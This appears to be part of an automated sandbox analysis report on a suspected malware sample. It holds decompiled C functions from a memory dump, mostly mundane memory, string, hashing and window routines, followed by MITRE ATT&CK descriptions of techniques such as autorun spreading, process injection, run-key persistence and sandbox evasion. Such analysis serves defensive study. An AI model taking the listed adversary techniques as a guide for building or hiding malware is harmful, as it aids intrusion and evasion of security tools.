0x00000000
0x00406db0
0x00406db5
0x00406dba
0x00406dbd
0x00406dbf
0x00406dbf
0x00406dc4
0x00406dca
0x00000000

APIs

Part of subcall function 00406A4E: free.MSVCRT(?,00406CC2,00000000,?,?), ref: 00406A51
Part of subcall function 00406A4E: free.MSVCRT(?,?,00406CC2,00000000,?,?), ref: 00406A59

free.MSVCRT(?,00000000,?,?), ref: 00406D47

Part of subcall function 00406B25: free.MSVCRT(Mxt,00000000,Mxt,00406D88,00000000,?,?), ref: 00406B34

Part of subcall function 004060FA: malloc.MSVCRT ref: 00406116
Part of subcall function 004060FA: memcpy.MSVCRT ref: 0040612E
Part of subcall function 004060FA: free.MSVCRT(00000000,00000000,Mxt,00406B49,00000001,?,00000000,Mxt,00406D88,00000000,?,?), ref: 00406137

Strings

Mxt, xrefs: 00406CC2, 00406D70
Mxt, xrefs: 00406D9B
Mxt, xrefs: 00406CCD, 00406D68

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: free$mallocmemcpy
String ID: Mxt$Mxt$Mxt
API String ID: 3401966785-884834091
Opcode ID: 0d8979ca83d77964b5e44f22b8dced07f100480b91d735ef0f206362fb305579
Instruction ID: 7250e0f20330e40a173f5fc6a92c528c9e1127f28f43d6e61f0a36e21e28d9d2
Opcode Fuzzy Hash: 0d8979ca83d77964b5e44f22b8dced07f100480b91d735ef0f206362fb305579
Instruction Fuzzy Hash: 22514871E0021AAFCB20DF99D4808DEFBB1BF54314B26817BE852B7381C734AA55CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040A119, Relevance: 6.1, APIs: 4, Instructions: 114
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040A119(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				signed int _t63;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t79;
				void* _t84;
				signed int _t86;
				char* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t106;
				void* _t107;

				_t84 = __eax;
				E0040892D(__eax, __eflags);
				_t86 = 0;
				_v12 = 0;
				while(1) {
					_t98 = _a4;
					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
						break;
					}
					_t86 = _t86 + 1;
					if(_t86 < 1) {
						continue;
					}
					if(strlen(_t98) >= 3) {
						break;
					}
					_t79 = atoi(_a4);
					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
					}
					L21:
					if(_a8 != 0) {
						_v12 = _v12 | 0x00001000;
					}
					_t63 = _v12;
					 *0x41748c =  *0x41748c + 1;
					 *((intOrPtr*)(0x417490 +  *0x41748c * 4)) = _t63;
					return _t63;
				}
				_t104 = 0;
				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
				_v16 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
					L14:
					_t100 = 0;
					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
					_v8 = 0;
					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
						L20:
						goto L21;
					}
					_t106 = 0;
					__eflags = 0;
					do {
						_v20 = E004069D2(0, _a4);
						_t67 = E004069D2(0, _a4);
						__eflags = _v20;
						if(_v20 >= 0) {
							L18:
							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
							goto L19;
						}
						__eflags = _t67;
						if(_t67 < 0) {
							goto L19;
						}
						goto L18;
						L19:
						_v8 = _v8 + 1;
						_t100 = _t100 + 0x10;
						_t106 = _t106 + 0x14;
						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
					goto L20;
				}
				_t102 = 0;
				__eflags = 0;
				do {
					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
					_push(_a4);
					_push(_t72);
					L004115C4();
					_push(_a4);
					_v20 = _t72;
					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
					_push(_t74);
					L004115C4();
					_t107 = _t107 + 0x10;
					__eflags = _v20;
					if(_v20 == 0) {
						L11:
						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
						_v16 = 1;
						goto L12;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L12;
					}
					goto L11;
					L12:
					_v8 = _v8 + 1;
					_t102 = _t102 + 0x10;
					_t104 = _t104 + 0x14;
					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
				__eflags = _v16;
				if(_v16 != 0) {
					goto L20;
				}
				goto L14;
			}

0x0040a120
0x0040a122
0x0040a127
0x0040a129
0x0040a12c
0x0040a12c
0x0040a136
0x00000000
0x00000000
0x0040a138
0x0040a13c
0x00000000
0x00000000
0x0040a148
0x00000000
0x00000000
0x0040a14d
0x0040a155
0x0040a176
0x0040a176
0x0040a257
0x0040a25c
0x0040a25e
0x0040a25e
0x0040a26b
0x0040a26e
0x0040a274
0x0040a27c
0x0040a27c
0x0040a17f
0x0040a181
0x0040a188
0x0040a18b
0x0040a18e
0x0040a1f2
0x0040a1f2
0x0040a1f4
0x0040a1fa
0x0040a1fd
0x0040a255
0x00000000
0x0040a256
0x0040a1ff
0x0040a1ff
0x0040a201
0x0040a21f
0x0040a224
0x0040a229
0x0040a22f
0x0040a235
0x0040a23e
0x00000000
0x0040a23e
0x0040a231
0x0040a233
0x00000000
0x00000000
0x00000000
0x0040a241
0x0040a241
0x0040a247
0x0040a24a
0x0040a24d
0x0040a24d
0x00000000
0x0040a201
0x0040a190
0x0040a190
0x0040a192
0x0040a198
0x0040a19c
0x0040a19f
0x0040a1a0
0x0040a1a5
0x0040a1a8
0x0040a1ae
0x0040a1b2
0x0040a1b3
0x0040a1b8
0x0040a1bb
0x0040a1bf
0x0040a1c5
0x0040a1ce
0x0040a1d1
0x00000000
0x0040a1d1
0x0040a1c1
0x0040a1c3
0x00000000
0x00000000
0x00000000
0x0040a1d8
0x0040a1d8
0x0040a1de
0x0040a1e1
0x0040a1e4
0x0040a1e4
0x0040a1ec
0x0040a1f0
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 0040892D: ??2@YAPAXI@Z.MSVCRT ref: 0040894E
Part of subcall function 0040892D: ??3@YAXPAX@Z.MSVCRT ref: 00408A15

strlen.MSVCRT ref: 0040A13F
atoi.MSVCRT ref: 0040A14D
_mbsicmp.MSVCRT ref: 0040A1A0
_mbsicmp.MSVCRT ref: 0040A1B3

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _mbsicmp$??2@??3@atoistrlen
String ID:
API String ID: 4107816708-0
Opcode ID: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
Instruction ID: ad5e67b725479cd3c0fe98911646f79d6f4c04cefe3616236e53ea043d5b2769
Opcode Fuzzy Hash: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
Instruction Fuzzy Hash: 24414B75900304AFCB10DFA9C580A9ABBF5FB48308F1084BEEC05AB392D7399A51CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC6D, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040BC6D(signed int __eax, void* __ecx, void* _a4) {
				unsigned int _t23;
				signed int _t25;
				unsigned int _t34;
				unsigned int _t36;
				void* _t40;
				unsigned int _t45;
				void* _t46;
				int _t47;
				void* _t48;
				void* _t50;

				_t48 = __ecx;
				_t34 = __eax;
				_t23 =  *(__ecx + 0x10);
				_t36 = _t23 + __eax * 8;
				 *(__ecx + 0x10) = _t36;
				if(_t36 < _t23) {
					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
				}
				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
				_t25 = _t23 >> 0x00000003 & 0x0000003f;
				if(_t25 == 0) {
					L6:
					if(_t34 >= 0x40) {
						_t45 = _t34 >> 6;
						do {
							memcpy(_t48 + 0x18, _a4, 0x40);
							_t50 = _t50 + 0xc;
							E0040BD8A(_t48 + 0x18, _t48);
							_a4 = _a4 + 0x40;
							_t34 = _t34 - 0x40;
							_t45 = _t45 - 1;
						} while (_t45 != 0);
					}
					_push(_t34);
					_push(_a4);
					_push(_t48 + 0x18);
				} else {
					_t46 = 0x40;
					_t47 = _t46 - _t25;
					_t40 = _t48 + 0x18 + _t25;
					if(_t34 >= _t47) {
						memcpy(_t40, _a4, _t47);
						_t50 = _t50 + 0xc;
						E0040BD8A(_t48 + 0x18, _t48);
						_a4 = _a4 + _t47;
						_t34 = _t34 - _t47;
						goto L6;
					} else {
						_push(_t34);
						_push(_a4);
						_push(_t40);
					}
				}
				return memcpy();
			}

0x0040bc72
0x0040bc74
0x0040bc76
0x0040bc79
0x0040bc7f
0x0040bc82
0x0040bc84
0x0040bc84
0x0040bc8c
0x0040bc92
0x0040bc95
0x0040bcc7
0x0040bcca
0x0040bcce
0x0040bcd1
0x0040bcda
0x0040bcdf
0x0040bce7
0x0040bcec
0x0040bcf0
0x0040bcf3
0x0040bcf3
0x0040bcd1
0x0040bcf6
0x0040bcf7
0x0040bcfd
0x0040bc97
0x0040bc99
0x0040bc9a
0x0040bc9e
0x0040bca2
0x0040bcb0
0x0040bcb5
0x0040bcbd
0x0040bcc2
0x0040bcc5
0x00000000
0x0040bca4
0x0040bca4
0x0040bca5
0x0040bca8
0x0040bca8
0x0040bca2
0x0040bd0a

APIs

memcpy.MSVCRT ref: 0040BCB0
memcpy.MSVCRT ref: 0040BCDA
memcpy.MSVCRT ref: 0040BCFE

Strings

@, xrefs: 0040BCEC

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memcpy
String ID: @
API String ID: 3510742995-2766056989
Opcode ID: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
Instruction ID: cecad1072309209c94eeb2778a75b30bbc980c70aaade9bdc77468b7d13379ad
Opcode Fuzzy Hash: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
Instruction Fuzzy Hash: 8B112BB29003056BDB288F16D8809AA77EAEF50344700063FFD0796291FB39DE55C6DC

Uniqueness

Uniqueness Score: -1.00%

Function 0040A437, Relevance: 6.0, APIs: 4, Instructions: 45
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040A437(void* __esi) {
				void* _v260;
				char _v516;
				void* __ebx;
				char* _t16;
				signed short _t25;
				signed short _t27;
				void* _t28;

				_t28 = __esi;
				_push(E00408647( *((intOrPtr*)(__esi + 0x370))));
				_t25 = 4;
				sprintf( &_v260, E004078FF(_t25));
				_t16 = E00408BDE( *((intOrPtr*)(__esi + 0x370)), 0);
				if(_t16 > 0) {
					_push(_t16);
					_t27 = 5;
					sprintf( &_v516, E004078FF(_t27));
					_t16 = strcat( &_v260,  &_v516);
				}
				if( *((intOrPtr*)(_t28 + 0x108)) != 0) {
					return SendMessageA( *(_t28 + 0x114), 0x401, 0,  &_v260);
				}
				return _t16;
			}

0x0040a437
0x0040a44c
0x0040a44f
0x0040a45d
0x0040a46d
0x0040a474
0x0040a476
0x0040a479
0x0040a487
0x0040a49a
0x0040a49f
0x0040a4aa
0x00000000
0x0040a4c0
0x0040a4c7

APIs

Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07

sprintf.MSVCRT ref: 0040A45D
SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A4C0

Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,74784DE0), ref: 0040797A
Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998

sprintf.MSVCRT ref: 0040A487
strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
String ID:
API String ID: 919693953-0
Opcode ID: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
Instruction ID: 75288aada6eb4f7a447a9cf13bdf828529425e42ebb21a5188d22772f738aad9
Opcode Fuzzy Hash: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
Instruction Fuzzy Hash: 2601DBB250030466D721B775DD86FEB73AC6F00304F40447BB74AF6082DABCE9808B29

Uniqueness

Uniqueness Score: -1.00%

Function 004098F4, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004098F4(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t15;
				intOrPtr* _t24;
				char* _t26;

				_t24 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
				_t26 =  &_v260;
				E00409018(_t26, _t15);
				sprintf( &_v516, "</%s>\r\n", _t26);
				return E00405EFD(_a4,  &_v516);
			}

0x0040990e
0x00409910
0x00409917
0x00409926
0x0040992d
0x00409939
0x0040993d
0x00409943
0x00409957
0x00409971

APIs

memset.MSVCRT ref: 00409917
memset.MSVCRT ref: 0040992D

Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060

sprintf.MSVCRT ref: 00409957

Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,Mxt,00000000,?,?,004092ED,00000001,00412B1C,74784DE0), ref: 00405F17

Strings

</%s>, xrefs: 00409951

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
String ID: </%s>
API String ID: 3202206310-259020660
Opcode ID: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
Instruction ID: adbfc7571eef3522ba50f6b4148bdf50dea618c8f0168b60c77ad4ff43fabaf4
Opcode Fuzzy Hash: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
Instruction Fuzzy Hash: B201D1729001297AD720A719CC45FDA7AACAF84304F0400FAB60AF3182DA749F848BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00408441, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408441(void** __esi, struct HWND__* _a4) {
				long _v12;
				signed int _v24;
				signed int _v28;
				short _v32;
				void* _v40;
				long _t17;
				short* _t23;
				int _t24;
				void** _t25;

				_t25 = __esi;
				_t24 = 0;
				if(_a4 != 0) {
					_t17 = memset( *__esi, 0, __esi[1] << 2);
					if(__esi[1] > 0) {
						do {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							_t23 =  *_t25 + _t24 * 4;
							_v40 = 0x22;
							_t17 = SendMessageA(_a4, 0x1019, _t24,  &_v40);
							if(_t17 != 0) {
								 *_t23 = _v32;
								_t17 = _v12;
								 *(_t23 + 2) = _t17;
							}
							_t24 = _t24 + 1;
						} while (_t24 < _t25[1]);
					}
				}
				return _t17;
			}

0x00408441
0x00408449
0x0040844e
0x0040845a
0x00408465
0x00408467
0x00408469
0x0040846d
0x00408471
0x00408481
0x00408488
0x00408490
0x00408496
0x00408499
0x0040849d
0x0040849d
0x004084a1
0x004084a2
0x00408467
0x00408465
0x004084aa

APIs

memset.MSVCRT ref: 0040845A
SendMessageA.USER32(?,00001019,00000000,?), ref: 00408488

Strings

", xrefs: 00408481

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: MessageSendmemset
String ID: "
API String ID: 568519121-123907689
Opcode ID: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
Instruction ID: 3d4b9897b9e590d379032152458179bae83636b6f0047c21005e3f982915147a
Opcode Fuzzy Hash: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
Instruction Fuzzy Hash: 4F01D635900205AFDB20CF95C941EAFB7F8FF84759F10842EE891AA240E738DA85CB75

Uniqueness

Uniqueness Score: -1.00%

Function 004084CE, Relevance: 5.1, APIs: 4, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004084CE(intOrPtr* __esi, void* __eflags) {
				intOrPtr* _t22;
				intOrPtr* _t31;

				_t31 = __esi;
				 *__esi = 0x413320;
				_t22 = E00406549(0x1c8, __esi);
				_push(0x14);
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 4)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 8)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 0xc)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				 *((intOrPtr*)(_t31 + 0x10)) = _t22;
				return _t31;
			}

0x004084ce
0x004084d6
0x004084dc
0x004084e1
0x004084e3
0x004084f3
0x00408505
0x004084f5
0x004084f5
0x004084f8
0x004084fa
0x004084fd
0x00408500
0x00408500
0x00408507
0x00408509
0x0040850c
0x00408514
0x00408526
0x00408516
0x00408516
0x00408519
0x0040851b
0x0040851e
0x00408521
0x00408521
0x00408528
0x0040852a
0x0040852d
0x00408535
0x00408547
0x00408537
0x00408537
0x0040853a
0x0040853c
0x0040853f
0x00408542
0x00408542
0x00408549
0x0040854b
0x0040854e
0x00408556
0x00408568
0x00408558
0x00408558
0x0040855b
0x0040855d
0x00408560
0x00408563
0x00408563
0x0040856b
0x00408571

APIs

Part of subcall function 00406549: memset.MSVCRT ref: 00406557

??2@YAPAXI@Z.MSVCRT ref: 004084E3
??2@YAPAXI@Z.MSVCRT ref: 0040850C
??2@YAPAXI@Z.MSVCRT ref: 0040852D
??2@YAPAXI@Z.MSVCRT ref: 0040854E

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
Instruction ID: 33d46294e57da76ea2c08804649fae6184d1477937e8cd9eb119e1572679ad16
Opcode Fuzzy Hash: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
Instruction Fuzzy Hash: F321B3B0A01300AED7518F2B9945955FBE4FF94355B2AC8AFD149DB2B2EBB8C8408F14

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

